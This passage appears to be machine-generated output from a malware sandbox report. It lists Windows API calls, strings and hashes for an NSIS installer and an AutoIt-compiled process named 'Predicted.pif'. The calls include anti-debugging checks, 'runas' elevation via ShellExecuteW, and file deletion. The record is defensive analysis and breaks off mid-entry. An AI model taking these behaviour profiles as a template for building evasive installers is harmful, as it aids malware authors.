Part of subcall function 00404A73: lstrcatW.KERNEL32(00447D88,0040304D), ref: 00404ACE
Part of subcall function 00404A73: SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
Part of subcall function 00404A73: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
Part of subcall function 00404A73: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
Part of subcall function 00404A73: SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E

Part of subcall function 004056EC: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0045FDD0,Error launching installer), ref: 00405711
Part of subcall function 004056EC: CloseHandle.KERNEL32(?), ref: 0040571E

WaitForSingleObject.KERNEL32(00000000,00000064,?,?,?,?,?,00000000,000000EB,00000000), ref: 0040202F
WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,?,?,?,00000000,000000EB,00000000), ref: 00402044
GetExitCodeProcess.KERNEL32(?,?), ref: 00402051
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,000000EB,00000000), ref: 004026BD

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: ad270f84a8785551dbcb8ed3b2656b967ed5d4589d67cc04499c355dac912d43
Instruction ID: 202ebcddbf8b426187c6ee2470dbf35ac1bf8be3455b7115f7585c4331235d23
Opcode Fuzzy Hash: ad270f84a8785551dbcb8ed3b2656b967ed5d4589d67cc04499c355dac912d43
Instruction Fuzzy Hash: 3E118231900214EADB219FA1CE08B9E7A75EB04358F104037E615B60E1C7BD8A82DB5D

Function 004026EF Relevance: 6.0, APIs: 4, Instructions: 46memoryfilestringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 004026F7
WideCharToMultiByte.KERNEL32(00000000,00000000,0040E0F0,000000FF,?,00002004,00000000,00000000), ref: 00402730
lstrlenA.KERNEL32(?), ref: 00402739
WriteFile.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00402756

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 4e4b35b0ddbdd6058c26d859be66250fdf62ee6eb5fca338a8859292909502b4
Instruction ID: ced7ad9a6504f6ed498d5adba380047bc9decdec085bb0b424ae9f8a02fb9dcb
Opcode Fuzzy Hash: 4e4b35b0ddbdd6058c26d859be66250fdf62ee6eb5fca338a8859292909502b4
Instruction Fuzzy Hash: F9014F70500205BEEB156F60CE4DBBF3A6CEF04744F10453AF641FA1E1DBB849419B69

Function 00401EF0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401EF7
GetDeviceCaps.GDI32(00000000), ref: 00401EFE
MulDiv.KERNEL32(00000000,00000000), ref: 00401F0E

Part of subcall function 004060CA: GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00422579,74DF23A0,00000000), ref: 0040619B

CreateFontIndirectW.GDI32(0041E110), ref: 00401F61

Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: a47370298229fbd9087b309e9c05a94d29a3d59c05c16ea411501fa641fe8ea9
Instruction ID: d6c42e3eeef43274fd936db1fda35bedcc132f3233f9f4bb317f1c521d1b95b8
Opcode Fuzzy Hash: a47370298229fbd9087b309e9c05a94d29a3d59c05c16ea411501fa641fe8ea9
Instruction Fuzzy Hash: BB018476644241AFE701ABB5AD4ABDE3BA4A715315F20883AE681B61E3CA784044CB2D

Function 00402E3A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403297,00000001,?,?,?,00000000,004035D7,?), ref: 00402E4D
GetTickCount.KERNEL32 ref: 00402E6B
CreateDialogParamW.USER32(0000006F,00000000,00402DB4,00000000), ref: 00402E88
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,004035D7,?), ref: 00402E96

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: c46447e93630878450969176786434de847f14ddf39dd8d972ff8c80f950fc89
Instruction ID: c637284af2d6cdf60ec22d353f69018081d624b8e4296ea034bdf55e3067f771
Opcode Fuzzy Hash: c46447e93630878450969176786434de847f14ddf39dd8d972ff8c80f950fc89
Instruction Fuzzy Hash: 89F05E30541A21EBC6616B20FE0CAAB7B64FB04B51B4008BFF945B11E4CB7448938BDD

Function 00405C29 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,00000000,00000000,0040219A,00000000,?), ref: 00405C34
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000), ref: 00405C4A
GetProcAddress.KERNEL32(?,00000000), ref: 00405C59
GlobalFree.KERNEL32(00000000), ref: 00405C62

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 7b8b1b869dc425c4e8d1decedcc15e3ea1801fb9e202fffad77dd5e1c54a2680
Instruction ID: e1c5d748dd31bcb7ed763deea17071bf78cda9c2e5a8ae371288e20c28570659
Opcode Fuzzy Hash: 7b8b1b869dc425c4e8d1decedcc15e3ea1801fb9e202fffad77dd5e1c54a2680
Instruction Fuzzy Hash: 00E092312001107BE2201B269E8CD6B7EACDFCA7B6B04013AF685E11A0CA308C11C678

Function 004043CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404403
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404471

Part of subcall function 00403937: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403949

Strings

, xrefs: 004043DB

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 9fdaa817c79f8fe2df8c01310cb7398ca4e4993dd3d52cefc4da2c44810d4525
Instruction ID: 950938491bfceb2c9a9aaf13ad46a3c9d7f26d5a45bb245acca2c437b02a68c6
Opcode Fuzzy Hash: 9fdaa817c79f8fe2df8c01310cb7398ca4e4993dd3d52cefc4da2c44810d4525
Instruction Fuzzy Hash: 52119EB1500228EBDF11AF91DD80E9B3729AF84325F00803BFB09751A2C77D89519FAA

Function 00406042 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5

Part of subcall function 00405807: CharNextW.USER32(?,004CC0A0,0045FE18,?,00406059,0045FE18,0045FE18,le@,004CC0A0,00000002,0040656C,?,004E00C8), ref: 00405815
Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 0040581A
Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 00405832

lstrlenW.KERNEL32(0045FE18,?,00000000,0045FE18,0045FE18,le@,004CC0A0,00000002,0040656C,?,004E00C8), ref: 004060A3
GetFileAttributesW.KERNEL32(0045FE18,0045FE18), ref: 004060B0

Strings

le@, xrefs: 00406044

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: le@
API String ID: 3248276644-3503961380
Opcode ID: fec7732a330a9e88aa59d831f20b6da9eee86d01c908d7265f8837d9fbe5c718
Instruction ID: e7db63e0e35e78dffee219aaf6f46514b8882a9137312b684398864940085c4f
Opcode Fuzzy Hash: fec7732a330a9e88aa59d831f20b6da9eee86d01c908d7265f8837d9fbe5c718
Instruction Fuzzy Hash: DF01F22219592159D622A73A1D88EAF2584CE86364717063FFC43B21D3DF3C896389BE

Function 0040243C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,00002003,00000000), ref: 00402478
lstrcmpW.KERNEL32(?,?,?,00002003,00000000), ref: 00402483

Strings

!N~, xrefs: 0040243C

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: fc1006ea5aab162bbc40b6df3c94a123494fc128051bda68380e80ee4f4a212d
Instruction ID: 97e2760095c772b904354d470d60f9b26315119a41df21907abd1c807f0e2d98
Opcode Fuzzy Hash: fc1006ea5aab162bbc40b6df3c94a123494fc128051bda68380e80ee4f4a212d
Instruction Fuzzy Hash: 5CF01275900214ABDB00BFA8DD859AE3BBCAB08300B00412EF601F71A2D67449019B94

Function 004056EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0045FDD0,Error launching installer), ref: 00405711
CloseHandle.KERNEL32(?), ref: 0040571E

Strings

Error launching installer, xrefs: 004056F5

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 8a3581b750d29c0f06103fe1997c215cccf07df72e665a86a296c08cae4d825b
Instruction ID: 53ccf60803aa8836d7366e45e4d019fb0888d0b7e4ffe46943b31cf4c1d238f5
Opcode Fuzzy Hash: 8a3581b750d29c0f06103fe1997c215cccf07df72e665a86a296c08cae4d825b
Instruction Fuzzy Hash: A6E0EC70500209BBEB009B64EE49D7B7BBCEB44345F404436AD51E2151D774D81C9A69

Function 00405864 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00406495,?,00000000,00000000,?,00000000,00406495,00000000,[Rename]), ref: 00405874
lstrcmpiA.KERNEL32(00000000,00406495), ref: 0040588C
CharNextA.USER32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 0040589D
lstrlenA.KERNEL32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 004058A6

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: cd19360c238f1349a786dd8267181da6a2629ba8d2dc02acca249f0761a9dd09
Instruction ID: 678e37072a379e1faffe29b6aa71237c6b28e2b3d53614aa4618b887c013b5be
Opcode Fuzzy Hash: cd19360c238f1349a786dd8267181da6a2629ba8d2dc02acca249f0761a9dd09
Instruction Fuzzy Hash: 2CF0C236501448EFE701AFA5CD00C9F7BA8EF46350B2580BAEC40F7311D634DE019BA8

Analysis Process: Predicted.pifPID: 7684, Parent PID: 7412COMMON

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	108

Executed Functions

Function 00215240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0021526C
IsDebuggerPresent.KERNEL32 ref: 0021527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002152E6

Part of subcall function 00211821: _memmove.LIBCMT ref: 0021185B

Part of subcall function 0020BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0020BC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00215366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00250B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00250B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,002B6D10), ref: 00250BE9
ShellExecuteW.SHELL32(00000000), ref: 00250BF0

Part of subcall function 0021514C: GetSysColorBrush.USER32(0000000F), ref: 00215156
Part of subcall function 0021514C: LoadCursorW.USER32(00000000,00007F00), ref: 00215165
Part of subcall function 0021514C: LoadIconW.USER32(00000063), ref: 0021517C
Part of subcall function 0021514C: LoadIconW.USER32(000000A4), ref: 0021518E
Part of subcall function 0021514C: LoadIconW.USER32(000000A2), ref: 002151A0
Part of subcall function 0021514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002151C6
Part of subcall function 0021514C: RegisterClassExW.USER32(?), ref: 0021521C

Part of subcall function 002150DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00215109
Part of subcall function 002150DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0021512A
Part of subcall function 002150DB: ShowWindow.USER32(00000000), ref: 0021513E
Part of subcall function 002150DB: ShowWindow.USER32(00000000), ref: 00215147

Part of subcall function 002159D3: _memset.LIBCMT ref: 002159F9
Part of subcall function 002159D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00215A9E

Strings

It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00250B28
AutoIt, xrefs: 00250B23
runas, xrefs: 00250BE4

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: 75d8d294a9f27de627849369b6c9c912dba2521cae39c48bfced51d7dc89738f
Instruction ID: e4be734b5e6b7db0000f4fffe9a8916ef74c32e09e05af517e35c7f58eecb81b
Opcode Fuzzy Hash: 75d8d294a9f27de627849369b6c9c912dba2521cae39c48bfced51d7dc89738f
Instruction Fuzzy Hash: DC510731934259EECB11EBB0EC89EEDBBB8AF65340B1041D9F96163162DB7105B4CF22

Function 00215D13 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00215D40

Part of subcall function 00211821: _memmove.LIBCMT ref: 0021185B

GetCurrentProcess.KERNEL32(?,00290A18,00000000,00000000,?), ref: 00215E07
IsWow64Process.KERNEL32(00000000), ref: 00215E0E
GetNativeSystemInfo.KERNEL32(00000000), ref: 00215E54
FreeLibrary.KERNEL32(00000000), ref: 00215E5F
GetSystemInfo.KERNEL32(00000000), ref: 00215E90
GetSystemInfo.KERNEL32(00000000), ref: 00215E9C

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 8063024ec3e9ad7ba85f61c51e2bf5191f68309e1045b958142b964f6bc59135
Instruction ID: de8eb00db2fcf89a748ce3d4826c1a95a90fffe1988d0f20f2c10ac2aaf92cf1
Opcode Fuzzy Hash: 8063024ec3e9ad7ba85f61c51e2bf5191f68309e1045b958142b964f6bc59135
Instruction Fuzzy Hash: 6F91F531969BD5DEC731CF7894501EAFFE56F79300B880A9ED4CB83A41D230A5A8C759

Function 00264005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00220284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00212A58,?,00008000), ref: 002202A4

Part of subcall function 00264FEC: GetFileAttributesW.KERNEL32(?,00263BFE), ref: 00264FED

FindFirstFileW.KERNEL32(?,?), ref: 0026407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 002640CC
FindNextFileW.KERNELBASE(00000000,00000010), ref: 002640DD
FindClose.KERNEL32(00000000), ref: 002640F4
FindClose.KERNEL32(00000000), ref: 002640FD

Strings

\*.*, xrefs: 0026404E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: cfbcccdfaa2255bd013ee20514fbcb274f5bdb51c223428ffde55cda3d70cb84
Instruction ID: 694edd4f236f52da76d464ee91f72543639b49e2d64aaa76cded93a167290a5a
Opcode Fuzzy Hash: cfbcccdfaa2255bd013ee20514fbcb274f5bdb51c223428ffde55cda3d70cb84
Instruction Fuzzy Hash: 2E3182310283559FC305FF60D8959EFB7E8BEA5304F440A1EF9E582191DB309969CBA3

Function 00264148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0026416D
Process32FirstW.KERNEL32(00000000,?), ref: 0026417B
Process32NextW.KERNEL32(00000000,?), ref: 0026419B
FindCloseChangeNotification.KERNEL32(00000000), ref: 00264245

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 60aa4f2b1b70a812c5d886bb4d3c40632fd0427aaf2db989510661b9dd0a0c3b
Instruction ID: ea97a41ccc67885446c67f0cbf248ce4bb3d26177f00c578e8cccb1ee073948d
Opcode Fuzzy Hash: 60aa4f2b1b70a812c5d886bb4d3c40632fd0427aaf2db989510661b9dd0a0c3b
Instruction Fuzzy Hash: C231B4711183419FD300EF50E895AAFBBE8AF95350F50052EFAC5C21A1EB7099A9CB92

Function 0020B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON

Download Yara Rule

APIs

